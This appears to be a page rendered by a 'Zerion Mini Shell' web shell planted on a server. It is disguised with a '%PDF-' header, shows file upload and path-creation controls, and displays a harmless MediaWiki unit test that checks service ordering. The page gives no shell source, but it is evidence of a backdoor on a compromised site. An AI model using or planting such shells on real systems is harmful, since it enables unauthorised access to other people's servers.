%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/thread-self/root/www/varak.net/wiki.varak.net/tests/phpunit/includes/
Upload File :
Create Path :
Current File : //proc/thread-self/root/www/varak.net/wiki.varak.net/tests/phpunit/includes/ServiceWiringTest.php

<?php

/**
 * @coversNothing
 */
class ServiceWiringTest extends MediaWikiTestCase {
	public function testServicesAreSorted() {
		global $IP;
		$services = array_keys( require "$IP/includes/ServiceWiring.php" );
		$sortedServices = $services;
		sort( $sortedServices );

		$this->assertSame( $sortedServices, $services,
			'Please keep services sorted alphabetically' );
	}
}

Zerion Mini Shell 1.0